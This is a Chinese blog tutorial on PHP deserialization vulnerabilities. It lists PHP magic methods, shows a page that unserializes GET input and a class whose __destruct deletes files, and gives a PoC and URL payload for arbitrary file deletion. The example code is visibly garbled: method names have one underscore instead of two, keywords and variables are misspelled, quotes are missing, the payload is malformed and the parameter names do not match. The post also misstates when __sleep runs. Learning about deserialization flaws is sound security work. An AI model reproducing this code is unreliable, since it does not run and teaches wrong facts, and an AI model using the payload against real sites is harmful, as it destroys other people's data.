反序列化漏洞(魔术方法)

最新推荐文章于 2023-07-22 10:40:16 发布
最新推荐文章于 2023-07-22 10:40:16 发布
阅读量164 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/126425481
版权

1、php常见魔术函数

_construct() //当一个对象创建时被调用

_destruct() //对象销毁时触发

_wakeup() //使用unseriaize时触发

_sleep() //使用unserialize触发

_toSring() //把类当作字符串使用时触发

_get() //用于从不可访问的数据中读出数据

_set() //用于将数据写入不可访问的属性

_set() //用于将数据写入不可访问的属性

_isset() //在不可访问的属性上调用isset()或empty()触发

_unset() //在不可访问的属性上使用unset()时触发

_invoke() //当脚本尝试将对象调用为函数时触发

2、实例(_destruct())

这是test5中代码

<?php 

/**

*删除文件

*/

class delete

{

   pulic $filename = 'error'

    function _destruct()

       {

           echo $this->fiename ."was deleted<br />;

           unlink(dirname(_FILE_).'/'.$this->filename);

       }

}

?>

从代码中分析delete类中定义_destruct()函数,该函数中会执行删除文件的操作。如果我们想利用该函数来执行任意文件删除,则需要寻找一个可控的unseralize()函数  

然后在test6.php中可以看到包含test5.php

<?php 

include 'test5.php

class person

  public $name =' ';

  public $age = 0;

  publuc funtion Information()

  {

     echo 'persion: '.$this->name. 'is' . $this->age . ' years old .<br />; 

   }

}

$per = unserialize($_GET['per_serialized']);

?>

可以看见最后一行

$per = unserialize($_GET['per_serialized']);test

per_serialize是我们可以控制的

如果我们知道在该目录下有一个1.txt文件,如果我们想删除这个文件,则可以构造如下poc

<?php

class delete

{

  public $filename = 'error';

}

$test = new delete();

$test -> filename = '1.txt';

echo serialize($test);

?>

可以得到我们的payload:

O:6:"delete":1:{s:8:"filename":s:5:"1.txt;}

xxxxx/test6.php?per_serialize = O:6:"delete":1:{s:8:"filename":s:5:"1.txt;}

安全~小菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全--反序列化漏洞(java篇)
bobo_milk的博客
11-29 3049
java反序列化参考
PHP反序列化漏洞(入门)-魔术方法+原生类
xiaoheizi的博客
07-02 1673
_sleep(): //serialize()函数检查类中是否存在一个魔术方法__sleep() 如果存在,该方法被优先调用。当对不可访问属性调用 isset() 或 empty() 时,__isset() 被调用。因为__toString()魔术方法是在把对象当做字符串使用的时候被调用,所以这里触发__toString()魔术方法。__isset(): //在不可访问的属性上调用isset()或empty()触发
Python反序列化漏洞魔术方法详细全解(构造、自动审计工具bandit)
ran的博客
04-17 2326
魔术方法执行调用下面的代码,如果下面的代码可控的话,就可能存在反序列化漏洞。pickle.dump(obj, file) :将对象序列化后保存到文件。 pickle.load(file) :读取文件, 将文件中的序列化内容反序列化为对象。 pickle.dumps(obj) :将对象序列化成字符串格式的字节流。 pickle.loads(bytes_obj) :将字符串格式的字节流反序列化为对象。寻找LV6 -> 购买修改支付逻辑 -> 绕过admin限制需修改jwt值 -> 爆破jwt密匙 -> 重组jw
PHP反序列化漏洞魔术方法
Naive的博客
07-22 1096
PHP魔术方法(Magic Methods)是一组特殊的方法,它们在特定的情况下被自动调用,用于实现对象的特殊行为或提供额外功能。本文详细介绍每一个魔术方法触发时机、功能、参数以及返回值。这一点是在学习 PHP 反序列化漏洞中最重要的。
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化将字符串.
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
weblogic的JAVA反序列化漏洞修改方法
04-28
windows版weblogic的JAVA反序列化漏洞修改方法,亲测
Java反序列化漏洞介绍书籍
08-17
专业介绍Java反序列化漏洞知识,攻防技术
魔术方法总结
梦里不知身是客
12-26 9843
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
魔术函数 __sleep 和 __wakeup
weixin_30455023的博客
10-25 134
魔术函数 __sleep 和 __wakeupserialize() 检查类中是否有魔术名称 __sleep 的函数。如果这样,该函数将在任何序列化之前运行。它可以清除对象并应该返回一个包含有该对象中应被序列化的所有变量名的数组。 使用 __sleep 的目的是关闭对象可能具有的任何数据库连接,提交等待中的数据或进行类似的清除任务。此外,如果有非常大的对象而并不需要完全储存下来时此函数也很...
反序列化魔术方法的浅学习
quan9i的博客
05-13 2312
前言 学习反序列化,那么就需要首先掌握魔术方法的使用,本篇文章将尽可能详细的讲解反序列化魔术方法,博主只是小白,如有问题还请各位师傅多多指点! 魔术方法 常见魔术方法有以下几种 __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完毕后执行。 __call:当调用对象中不存在的方法自动调用该方法。 __get():获取对象不存在的属性时执行此函数。 __set():设置对象不存在的属性时执行此函数。 __toString
PHP反序列化&魔术方法
weixin_54882883的博客
06-17 893
php反序列化
360 安全入门 · 课程测试
qq_41814777的博客
10-04 3564
实训平台 360U3161080787 安全入门 · 课程测试00:30:24 1.(单选题) 《基本要求》分为技术要求和管理要求,其中技术要求包括安全物理环境、安全区域边界、安全计算环境、(  )(1分) A. 整体安全 B. 安全管理中心 C. 操作系统安全 D. 数据库安全 回答正确 答案解析: 略 2.(单选题) Syn +Ack flood攻击是利用什么协议的漏洞( )(1分) A...
反序列化漏洞-----(1) 什么是序列化和反序列化和魔法函数
Z_Grant的博客
11-11 1097
文章目录一、基础概念 一、基础概念 序列化与反序列化开发过程中不可或缺的一步,简单来说,序列化是将对象转换成字节流的过程,而反序列化的是将字节流恢复成对象的过程。两者的关系如下: 序列化: 将数据结构或对象转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程 目的 ①以某种存储形式使自定义对象持久化; ②将对象从一个地...
(渗透学习)PHP 反序列化漏洞---魔术方法使用不当引发的后果
yang1234567898的博客
12-26 680
序列化:serialize() 反序列化:unserialize() 序列化对象: <?php class whatDo { var $x = "imz"; var $y = 10; } $obj = new whatDo(); echo serialize($obj); ?> 输出:O:6:"whatDo":2:{s:1:"x";s:3:"imz";s:1:"y";i:10;} 反序列化漏洞成因: 在PHP中,当对象在被使用时,自动触发魔术方法,如: ..
第二十二天php反序列化问题
代码审计
03-31 1857
序列化 百度百科上关于序列化的定义是, 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化 期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对 象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安 全的进行通信。 PHP中的序列化与反序列化 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一 旦利用成功就造成非常危险的后果。漏洞的形成的根本原因是程序没
反序列化漏洞总结
dreamthe的博客
11-24 3350
1.了解序列化和反序列化 在学习反序列化漏洞之前,需要了解什么是反序列化和序列化,我看到了一个很好的比喻,觉得很适合帮助大家对于两者理解,相信大家都在淘宝买过东西,不知道有没有买过那种小型家具,我有买过鞋柜,商家发货的时候不将一个完好的鞋柜寄给你,第一因为中途可能损坏,第二呢就是增加包装成本。所以商家都将鞋柜所有部件打包寄过来,顾客拿到快递在自己根据安装教程安装好鞋柜。那么这里面就有两个过程,一个是商家将所以部件打包发走,一个是你拿到安装还原。那么序列化就是商家打包过程,反序列化就是将商品还原过程。
fastjson反序列化漏洞修复方法
最新发布
12-27
Fastjson反序列化漏洞的修复方法主要包括以下几个方面: 1. 更新Fastjson版本:及时更新Fastjson的版本可以修复已知的漏洞,并且新版本通常增加更多的安全性措施。 2. 配置白名单:通过配置白名单,限制Fastjson...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值